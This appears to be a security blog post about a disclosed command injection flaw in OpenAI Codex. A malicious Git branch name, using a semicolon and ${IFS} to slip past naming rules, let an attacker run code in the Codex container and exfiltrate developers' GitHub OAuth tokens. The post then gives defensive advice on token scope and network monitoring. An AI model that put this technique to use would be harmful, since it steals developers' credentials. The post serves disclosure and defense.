On March 30, 2026, BeyondTrust disclosed a critical command injection vulnerability in OpenAI Codex. The branch name parameter -- the Git branch Codex operates on -- was passed directly into a shell command without sanitization. A semicolon in the branch name gave an attacker arbitrary code execution inside the Codex container, including the ability to exfiltrate the user's GitHub OAuth token.
The automated attack variant is worse. An attacker creates a malicious branch name via the GitHub API, using ${IFS} to replace spaces and bypass GitHub's naming restrictions. Any developer who runs a Codex task against that branch silently leaks their GitHub token. Zero clicks needed. The token gets sent to an attacker-controlled server, and the developer never sees a thing.
OpenAI patched this on February 5, 2026, rating it P1 Critical. It affected the ChatGPT website, Codex CLI, Codex SDK, and IDE extensions.
The Bigger Problem
This is not just an OpenAI bug. It is a pattern.
AI coding assistants are being given increasing access to development environments: shell execution, file system access, Git operations, API credentials. Teams are connecting these tools to their production repositories, their CI/CD pipelines, their cloud credentials. And the security model for most of these integrations is "trust the tool."
The Codex vulnerability is a textbook shell injection. Passing unsanitized user input into a shell command is one of the oldest categories of security bugs. It is the kind of thing any experienced engineer would catch in a code review. But when the tool doing the execution is an AI assistant running in a sandboxed container, the assumption is that the sandbox handles it. It did not.
What Infrastructure Teams Should Consider
If your developers are using AI coding tools connected to your org's repositories, ask these questions:
- What OAuth scopes are those tokens granted? If Codex had a token with
reposcope, the attacker got read and write access to every private repository in the org. Scope tokens to the minimum required. - Are AI tools running in your CI/CD pipeline? If so, what credentials do they have access to? A compromised AI tool running in a build container has the same access as any other build step.
- Do you audit which branches your team operates on? Malicious branch names sound exotic until you realize anyone with push access to a public fork can create one.
- Are you monitoring outbound network connections from dev environments? The exfiltrated token was sent to an external server. Network monitoring catches this if you have it. Most dev environments do not.
The Takeaway
AI dev tools are powerful and they are here to stay. But every new tool you connect to your development infrastructure is an expansion of your attack surface. The Codex vulnerability was patched quickly, but it exposed a fundamental gap: teams are granting AI tools deep access to their code and credentials without applying the same security scrutiny they would give to any other third-party integration.
Treat AI coding assistants like any other service with access to your infrastructure. Scope their permissions. Monitor their network activity. Review what they can reach. The convenience is real, but so is the risk.
Source: BeyondTrust technical analysis via r/sysadmin discussion